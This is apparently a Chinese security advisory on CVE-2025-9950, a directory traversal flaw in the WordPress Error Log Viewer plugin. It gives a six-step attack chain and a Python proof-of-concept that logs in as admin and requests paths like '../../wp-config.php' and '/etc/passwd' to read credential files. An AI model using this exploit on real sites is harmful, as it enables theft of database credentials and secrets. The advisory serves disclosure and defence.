CVE-2025-9950：WordPress Error Log Viewer插件目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-9950

漏洞类型

目录遍历（Path Traversal）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Error Log Viewer by BestWebSoft（WordPress插件）

漏洞概述

CVE-2025-9950是WordPress插件Error Log Viewer by BestWebSoft中存在的一个目录遍历（Directory Traversal）漏洞。该漏洞由Wordfence安全团队的研究员发现，并于2025年10月11日公开披露。该插件是一款用于查看WordPress网站错误日志的工具，在1.1.6及之前的所有版本中，其rrrlgvwr_get_file函数未对用户输入的文件路径进行充分的验证和过滤，导致存在目录遍历漏洞。

根据CVSS 3.1评分体系，该漏洞评分为4.9分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）才能利用，即需要经过身份认证的管理员级别访问权限。该漏洞无需用户交互（UI:N），主要影响机密性（C:H），对完整性和可用性没有影响。

该漏洞的利用后果是严重的：经过身份认证的攻击者（需要管理员及以上权限）可以通过构造特殊的请求，利用目录遍历技术读取服务器上的任意文件，包括可能包含敏感信息的配置文件（如wp-config.php）、系统文件等。这可能导致数据库凭据、API密钥等敏感信息泄露，对网站安全构成重大威胁。

值得注意的是，尽管该漏洞需要管理员权限才能利用，但在WordPress环境中，管理员账户被盗用或存在恶意管理员的情况并不少见，因此该漏洞仍然具有较高的实际危害性。

技术细节

该漏洞的核心问题出在Error Log Viewer插件的rrrlgvwr_get_file函数中。该函数负责处理文件读取操作，但未对用户提供的文件路径进行适当的验证和过滤。

在正常情况下，该函数预期接收的是错误日志文件的路径。然而，由于缺乏对路径遍历序列（如../）的过滤，攻击者可以通过构造包含目录遍历序列的恶意路径，绕过服务器的文件系统访问限制，访问位于Web根目录之外的文件。

具体利用方式如下：

1. 攻击者首先需要获取WordPress站点的管理员账户凭据（通过暴力破解、钓鱼、社会工程学等手段）。
2. 登录到WordPress后台，确保拥有管理员级别权限。
3. 构造包含目录遍历序列的恶意请求，调用rrrlgvwr_get_file函数。
4. 通过类似`../../../../etc/passwd`或`../../wp-config.php`的路径，读取服务器上的敏感文件。
5. 从读取到的文件中提取数据库凭据、API密钥等敏感信息。

漏洞的根本原因是开发者信任了用户输入的文件路径参数，未使用白名单机制或路径规范化处理来防止目录遍历攻击。修复方案应包括对文件路径进行严格的验证，限制可访问的目录范围，以及使用basename()等函数处理用户输入。

攻击链分析

STEP 1

步骤1：获取管理员凭据

攻击者通过暴力破解、钓鱼攻击、社会工程学或利用其他漏洞获取WordPress站点的管理员级别账户凭据。

STEP 2

步骤2：登录WordPress后台

使用获取的管理员凭据登录到目标WordPress站点的管理后台，确保拥有执行插件功能的足够权限。

STEP 3

步骤3：构造目录遍历Payload

构造包含目录遍历序列（如../）的恶意文件路径，目标是读取Web根目录之外的敏感文件，如wp-config.php。

STEP 4

步骤4：利用rrrlgvwr_get_file函数

通过插件的rrrlgvwr_get_file函数提交恶意请求，由于该函数未对路径进行验证，攻击者可以读取任意文件。

STEP 5

步骤5：提取敏感信息

从读取到的文件中提取数据库凭据、API密钥、加密密钥等敏感信息，用于进一步攻击或数据窃取。

STEP 6

步骤6：横向移动或数据泄露

利用获取的敏感信息进行进一步的攻击，如数据库入侵、服务器控制或大规模数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9950 PoC - Error Log Viewer Directory Traversal
# Vulnerability: Directory Traversal in rrrlgvwr_get_file function
# Affected: Error Log Viewer by BestWebSoft <= 1.1.6
# Requirements: Administrator-level WordPress access

import requests

# Target WordPress site configuration
TARGET_URL = "http://target-wordpress-site.com"
ADMIN_USERNAME = "admin"
ADMIN_PASSWORD = "password"

# Step 1: Authenticate as administrator
session = requests.Session()
login_data = {
    'log': ADMIN_USERNAME,
    'pwd': ADMIN_PASSWORD,
    'wp-submit': 'Log In',
    'redirect_to': f'{TARGET_URL}/wp-admin/',
    'testcookie': '1'
}
session.post(f'{TARGET_URL}/wp-login.php', data=login_data)

# Step 2: Exploit directory traversal to read arbitrary files
# The vulnerable function rrrlgvwr_get_file does not sanitize file paths
traversal_paths = [
    "../../../../etc/passwd",
    "../../../../wp-config.php",
    "../../../wp-config.php",
    "../../wp-config.php"
]

for path in traversal_paths:
    # Construct the malicious request to read arbitrary files
    exploit_url = f'{TARGET_URL}/wp-admin/admin.php?page=error-log-viewer'
    params = {
        'action': 'view',
        'file': path  # Directory traversal payload
    }
    
    response = session.get(exploit_url, params=params)
    
    if response.status_code == 200 and len(response.text) > 0:
        print(f"[+] Successfully read file via path: {path}")
        print(response.text[:500])
        break

# Alternative exploitation via direct file parameter
def exploit_directory_traversal(base_url, session, target_file):
    """
    Exploit the rrrlgvwr_get_file directory traversal vulnerability
    to read arbitrary files from the server.
    """
    payload = {
        'rrrlgvwr_action': 'get_file',
        'file': target_file  # e.g., ../../wp-config.php
    }
    
    response = session.post(
        f'{base_url}/wp-admin/admin-ajax.php',
        data=payload
    )
    return response.text

# Read sensitive configuration file
sensitive_content = exploit_directory_traversal(TARGET_URL, session, "../../wp-config.php")
print(f"[*] Sensitive content retrieved: {sensitive_content[:200]}")

影响范围

Error Log Viewer by BestWebSoft <= 1.1.6

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制WordPress管理员账户数量，仅授予必要的用户管理员权限；2）启用Wordfence等安全插件的文件完整性监控功能；3）通过Web应用防火墙（WAF）规则阻止包含目录遍历序列的请求；4）监控wp-config.php等敏感文件的访问日志；5）暂时禁用Error Log Viewer插件直到修复版本发布。